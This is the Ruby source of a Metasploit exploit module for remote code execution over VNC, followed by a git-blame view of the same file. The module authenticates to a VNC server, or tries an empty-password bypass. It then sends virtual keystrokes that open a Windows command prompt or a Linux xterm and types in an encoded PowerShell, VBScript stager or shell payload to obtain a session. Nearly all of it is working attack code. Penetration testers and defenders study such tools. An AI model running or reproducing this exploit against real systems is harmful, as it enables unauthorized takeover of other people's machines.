modules/exploits/multi/vnc/vnc_keyboard_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/rfb'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking
  WINDOWS_KEY = "\xff\xeb"
  ENTER_KEY = "\xff\x0d"

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'VNC Keyboard Remote Code Execution',
      'Description'     => %q{
        This module exploits VNC servers by sending virtual keyboard keys and executing
        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
        and a payload is typed and executed.
      },
      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
      'Privileged'      => false,
      'License'         => MSF_LICENSE,
      'Platform'       => %w{ win unix },
      'Targets'         =>
        [
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
        ],
      'DisclosureDate'  => 'Jul 10 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        Opt::RPORT(5900),
        OptString.new('PASSWORD', [ false, 'The VNC password']),
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
      ])
  end

  def post_auth?
    true
  end

  def press_key(key)
    keyboard_key = "\x04\x01" # Press key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def release_key(key)
    keyboard_key = "\x04\x00" # Release key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def exec_command(command)
    values = command.chars.to_a
    values.each do |value|
      press_key("\x00#{value}")
      release_key("\x00#{value}")
    end
    press_key(ENTER_KEY)
  end


  def start_cmd_prompt
    print_status("#{rhost}:#{rport} - Opening Run command")
    # Pressing and holding windows key for 1 second
    press_key(WINDOWS_KEY)
    Rex.select(nil, nil, nil, 1)
    # Press the "r" key
    press_key("\x00r")
    # Now we can release both keys again
    release_key("\x00r")
    release_key(WINDOWS_KEY)
    # Wait a second to open run command window
    select(nil, nil, nil, 1)
    exec_command('cmd.exe')
    # Wait a second for cmd.exe prompt to open
    Rex.select(nil, nil, nil, 1)
  end


  def exploit

    begin
      alt_key = "\xff\xe9"
      f2_key = "\xff\xbf"
      password = datastore['PASSWORD']

      connect
      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)

      unless vnc.handshake
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
      end

      if password.nil?
        print_status("#{rhost}:#{rport} - Bypass authentication")
        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
        sock.put("\x10")
      else
        print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
        if vnc.authenticate(password)
          print_status("#{rhost}:#{rport} - Authenticated")
        else
          fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
        end
      end

      # Send shared desktop
      unless vnc.send_client_init
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
      end

      if target.name =~ /VBScript CMDStager/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        execute_cmdstager({:flavor => :vbs, :linemax => 8100})
        # Exit the CMD prompt
        exec_command('exit')
      elsif target.name =~ /Powershell/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
        # Execute powershell payload and make sure we exit our CMD prompt
        exec_command("#{command} && exit")
      elsif target.name =~ /Linux/
        print_status("#{rhost}:#{rport} - Opening 'Run Application'")
        # Press the ALT key and hold it for a second
        press_key(alt_key)
        Rex.select(nil, nil, nil, 1)
        # Press F2 to start up "Run application"
        press_key(f2_key)
        # Release ALT + F2
        release_key(alt_key)
        release_key(f2_key)
        # Wait a second for "Run application" to start
        Rex.select(nil, nil, nil, 1)
        # Start a xterm window
        print_status("#{rhost}:#{rport} - Opening xterm")
        exec_command('xterm')
        # Wait a second for "xterm" to start
        Rex.select(nil, nil, nil, 1)
        # Execute our payload and exit (close) the xterm window
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        exec_command("nohup #{payload.encoded} &")
        exec_command('exit')
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")
      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)

        # Success! session is here!
        break if session_created?
      end

    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  def execute_command(cmd, opts = {})
    exec_command(cmd)
  end
end
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'rex/proto/rfb'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Fix ranking 2015-07-10 17:49:15 -05:00			`Rank = GreatRanking`
Do code cleanup 2015-07-10 18:35:13 -05:00			`WINDOWS_KEY = "\xff\xeb"`
			`ENTER_KEY = "\xff\x0d"`

VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::CmdStager`
			`include Msf::Exploit::Powershell`

			`def initialize(info = {})`
			`super(update_info(info,`
Update information 2015-07-10 18:39:11 -05:00			`'Name' => 'VNC Keyboard Remote Code Execution',`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`'Description' => %q{`
			`This module exploits VNC servers by sending virtual keyboard keys and executing`
			`a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager`
			`payload is typed and executed. On Unix/Linux systems a xterm terminal is opened`
			`and a payload is typed and executed.`
			`},`
			`'Author' => [ 'xistence <xistence[at]0x90.nl>' ],`
			`'Privileged' => false,`
			`'License' => MSF_LICENSE,`
			`'Platform' => %w{ win unix },`
			`'Targets' =>`
			`[`
Fix ranking 2015-07-10 17:49:15 -05:00			`[ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`[ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],`
			`[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]`
			`],`
Add reference 2015-07-10 18:46:06 -05:00			`'References' =>`
			`[`
			`[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']`
			`],`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`'DisclosureDate' => 'Jul 10 2015',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(5900),`
			`OptString.new('PASSWORD', [ false, 'The VNC password']),`
Do code cleanup 2015-07-10 18:35:13 -05:00			`OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`

Update false negatives on post auth information 2018-08-20 15:43:07 -05:00			`def post_auth?`
			`true`
			`end`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00
Do code cleanup 2015-07-10 18:35:13 -05:00			`def press_key(key)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`keyboard_key = "\x04\x01" # Press key`
			`keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data`
			`keyboard_key << key # The keyboard key`
			`# Press the keyboard key. Note: No receive is done as everything is sent in one long data stream`
			`sock.put(keyboard_key)`
			`end`


Do code cleanup 2015-07-10 18:35:13 -05:00			`def release_key(key)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`keyboard_key = "\x04\x00" # Release key`
			`keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data`
			`keyboard_key << key # The keyboard key`
Do code cleanup 2015-07-10 18:35:13 -05:00			`# Release the keyboard key. Note: No receive is done as everything is sent in one long data stream`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`sock.put(keyboard_key)`
			`end`


Do code cleanup 2015-07-10 18:35:13 -05:00			`def exec_command(command)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`values = command.chars.to_a`
			`values.each do \|value\|`
			`press_key("\x00#{value}")`
			`release_key("\x00#{value}")`
			`end`
Do code cleanup 2015-07-10 18:35:13 -05:00			`press_key(ENTER_KEY)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`


Do code cleanup 2015-07-10 18:35:13 -05:00			`def start_cmd_prompt`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`print_status("#{rhost}:#{rport} - Opening Run command")`
			`# Pressing and holding windows key for 1 second`
Do code cleanup 2015-07-10 18:35:13 -05:00			`press_key(WINDOWS_KEY)`
			`Rex.select(nil, nil, nil, 1)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Press the "r" key`
			`press_key("\x00r")`
			`# Now we can release both keys again`
			`release_key("\x00r")`
Do code cleanup 2015-07-10 18:35:13 -05:00			`release_key(WINDOWS_KEY)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Wait a second to open run command window`
			`select(nil, nil, nil, 1)`
Do code cleanup 2015-07-10 18:35:13 -05:00			`exec_command('cmd.exe')`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Wait a second for cmd.exe prompt to open`
Do code cleanup 2015-07-10 18:35:13 -05:00			`Rex.select(nil, nil, nil, 1)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`


			`def exploit`

			`begin`
			`alt_key = "\xff\xe9"`
			`f2_key = "\xff\xbf"`
			`password = datastore['PASSWORD']`

			`connect`
			`vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)`

			`unless vnc.handshake`
Do code cleanup 2015-07-10 18:35:13 -05:00			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`

Do code cleanup 2015-07-10 18:35:13 -05:00			`if password.nil?`
			`print_status("#{rhost}:#{rport} - Bypass authentication")`
			`# The following byte is sent in case the VNC server end doesn't require authentication (empty password)`
			`sock.put("\x10")`
			`else`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")`
			`if vnc.authenticate(password)`
			`print_status("#{rhost}:#{rport} - Authenticated")`
			`else`
Do code cleanup 2015-07-10 18:35:13 -05:00			`fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`
			`end`

			`# Send shared desktop`
			`unless vnc.send_client_init`
Do code cleanup 2015-07-10 18:35:13 -05:00			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`

			`if target.name =~ /VBScript CMDStager/`
Do code cleanup 2015-07-10 18:35:13 -05:00			`start_cmd_prompt`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`print_status("#{rhost}:#{rport} - Typing and executing payload")`
			`execute_cmdstager({:flavor => :vbs, :linemax => 8100})`
			`# Exit the CMD prompt`
Do code cleanup 2015-07-10 18:35:13 -05:00			`exec_command('exit')`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`elsif target.name =~ /Powershell/`
Do code cleanup 2015-07-10 18:35:13 -05:00			`start_cmd_prompt`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`print_status("#{rhost}:#{rport} - Typing and executing payload")`
Do code cleanup 2015-07-10 18:35:13 -05:00			`command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Execute powershell payload and make sure we exit our CMD prompt`
			`exec_command("#{command} && exit")`
			`elsif target.name =~ /Linux/`
Do code cleanup 2015-07-10 18:35:13 -05:00			`print_status("#{rhost}:#{rport} - Opening 'Run Application'")`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Press the ALT key and hold it for a second`
			`press_key(alt_key)`
Do code cleanup 2015-07-10 18:35:13 -05:00			`Rex.select(nil, nil, nil, 1)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Press F2 to start up "Run application"`
			`press_key(f2_key)`
			`# Release ALT + F2`
			`release_key(alt_key)`
			`release_key(f2_key)`
			`# Wait a second for "Run application" to start`
Do code cleanup 2015-07-10 18:35:13 -05:00			`Rex.select(nil, nil, nil, 1)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Start a xterm window`
			`print_status("#{rhost}:#{rport} - Opening xterm")`
Do code cleanup 2015-07-10 18:35:13 -05:00			`exec_command('xterm')`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Wait a second for "xterm" to start`
Do code cleanup 2015-07-10 18:35:13 -05:00			`Rex.select(nil, nil, nil, 1)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`# Execute our payload and exit (close) the xterm window`
			`print_status("#{rhost}:#{rport} - Typing and executing payload")`
			`exec_command("nohup #{payload.encoded} &")`
Do code cleanup 2015-07-10 18:35:13 -05:00			`exec_command('exit')`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`

Add waiting message 2015-07-10 18:48:46 -05:00			`print_status("#{rhost}:#{rport} - Waiting for session...")`
Do code cleanup 2015-07-10 18:35:13 -05:00			`(datastore['TIME_WAIT']).times do`
			`Rex.sleep(1)`

			`# Success! session is here!`
			`break if session_created?`
			`end`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00
			`rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e`
Do code cleanup 2015-07-10 18:35:13 -05:00			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`ensure`
			`disconnect`
			`end`
			`end`

			`def execute_command(cmd, opts = {})`
Do code cleanup 2015-07-10 18:35:13 -05:00			`exec_command(cmd)`
VNC Keyboard Exec 2015-07-10 14:08:32 +07:00			`end`
			`end`